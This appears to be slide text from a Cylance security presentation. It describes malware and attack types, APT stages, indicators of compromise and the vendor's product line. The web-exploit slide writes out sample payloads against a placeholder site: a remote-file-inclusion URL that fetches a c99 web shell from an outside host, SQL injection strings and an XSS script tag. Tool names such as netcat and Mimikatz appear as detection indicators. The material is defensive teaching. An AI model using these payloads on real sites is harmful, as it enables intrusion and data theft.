Corey White, VP, Professional Services

CylanceMathematical Determination ofGood and Bad Leveraging Preventative/ Response Professional Services

PRESPONSE Professional Services

Risk Does Not Equal Threat | Presponse Compromise Assessment

Malware - Windows / Linux / OSX (31% didn’t use malware)

• Dropper/Downloaders – Phishing & Waterholing Malware in Userspace Zero/Single-day Exploits that lead to…

• Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)

• BOTNETs – Platforms for MAAS/Subscription Access

• WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)

Hacking - .day Exploits• Zero Day

• Vulnerability that only the developer knows about

• ½ Day• Vulnerability that is known about but no patches are yet available

• Single Day• Vulnerability that is known about and patches are available but not applied

• Forever Day• Vulnerability that is known and cannot be patched

Hacking - Web Server/Services Exploits

• Remote code execution (watch your .htaccess files!)• register_globals on in PHP | require ($page . ".php");

http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt

• SQL injection (watch your user privileges!)• AND / OR in SQL $query | $query = "SELECT * FROM users WHERE

username = '' or '1=1'";http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version),,

• Cross Site Scripting/XSS (watch your syntax!)• Volatile entry in Echo | <?php echo "<p>Your Name <br />"; echo

($_GET[name_1]); ?> http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>

• Username enumeration (watch your error messages!)• Username guessing | Incorrect logon / password combination

Social Engineering – Access, Behavior, and Authority

Subversion

• Contractors• Employees

Sabotage

• Phishing• Waterholing• USB “HoneyDrops” & Other

Free Hardware• “HelpDesk Operators”• “Visitors” (Repairmen, Janitors,

Pizza/Flower Delivery, Tailgaters)

Advanced Persistent Threat - Activities

Stage 2 - Exploit• Privilege

Escalation• Lateral Movement• User Profile Abuse• Remote Access

Provisioning• Services

Bypass/Cancellation

Stage 1 - Compromise

• Social Engineering Backdoors• Phishing / Waterholing• Help Desk / Visitors

• Web Site Backdoors

• Reconnaissance

Stage 3 - Control• Configuration

Management• Data Targeting• Data Exfiltration• Sabotage• Subversion

Most commonly seen indicators of data loss:

• Non-standard Packagers (7z, Gz, RAR, PKZIP, etc.)

• Multipart Files of particular sizes (250/500Mb)

• “Recycle”/Recycle Bin Residue

• HTTP 206 Status Codes on Web Servers

• Non-standard File Transfer Services (Filezilla, FTP, WsFTP, etc.)

• Non-standard Reverse/Proxy Services (HUCs, PLINK, NC, SSH, etc.)

Most commonly seen indicators of sabotage:

• Unusual Prefetch / Recent / LNK / Bash binary execution history

• AT / CRON Jobs

• Scripts

• Services Cancellation

• User Profile Authority Changes

Most commonly seen indicators of user profile abuse:

• Multiple user accounts on single computer

• User account on multiple computers

• Service & Administrative account propagation

• Extranet LDAP/AD account use

• Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)

• Local Services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)

Most commonly seen indicators of lateral movement:

• Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)

• MSTSC history (.RDP, .BMC)

• Remote job scheduling (AT, SC, WMIC, SSH)

• Redundant & non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PUTTY, PSEXEC, *FTP, SCP)

• Domain Services history (DSGET, DSQUERY, HYENA)

• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)

Most commonly seen indicators of insider threats:

• Unusual profile access and use history• Time• HostID• Application History• Configuration History

• RBAC violations

• Other Acceptable Use Policy violations

• Malware / PUP / PUM…

Most common malware identifiers:

• Authority – service, administrator, or user

• Persistence – only 4 persistence mechanisms in Windows

• Communications – only 44 netsvcs keys in Windows Services

• Functionality – user and kernel combinations are rare

• File System – user or system

Risk Does Not Equal Threat | Presponse Compromise Assessment

Issues Not Indicators

Focus on Priorities

Get Ahead of Compromise Activities• Monitor

– Persistence settings: registry keys, startup folders, scheduled jobs/tasks

– Service creations

• Alert– User Profile Propagation– Lateral Movement/Access– Anomalous Use (time/resources)– Service State Changes (start/stop)– File creations by type (RAR, BAT, VBS, SH, etc.)– Sinkhole Communications

• Prevent– Assess and Secure Networks & Applications– Automated Tasks– Known PUP/PUMs– User-space Execution

Prevent

Victimization

CANDY DROP

SUPPLY CHAIN

SOCIAL ENGINEERING

EMAIL

WEB

DIRECT OPEN PORTSTCP/135INSIDER

STARVATION

Innovation Requires

WARNING: Deprogramming Required

JUST 100% Pure MATH

NOSignatures

NOHeuristics

NO Behavioral

NOSandboxing

NODynamic

Detonation

NOMicro-

Virtualization

MALICIOUS GOOD

Blacklist

“THE GREYLIST”UNKNOWN

Sandboxing

Servers AV

Antivirus / HIPS

FirewallEmail / WebGateway

IDS/IPS

Whitelisting

100% Pure Math

GAP (60%+)20%

Whitelist

20%

Behavioral Analysis

TrusttheVendorTrust

theMath

JUNE 2013

Infinity

Product Portfolio

• Free, Silent• REST API over SSL• Advanced Threat• Over 5,000 seats

Detection only

OCTOBER 2013

• V-API• V-Forensics• V-Gateway• V-Helpdesk

Detection only

FEBRUARY 2014

• Windows Agent• Cloud management• Silent / small footprint

Detection and Protection

DETECTSWEEP*DETECTSWEEP*

APRIL 2014

• Browser delivery• Detection of threats• Silent / small footprint

Detectionwith Protection option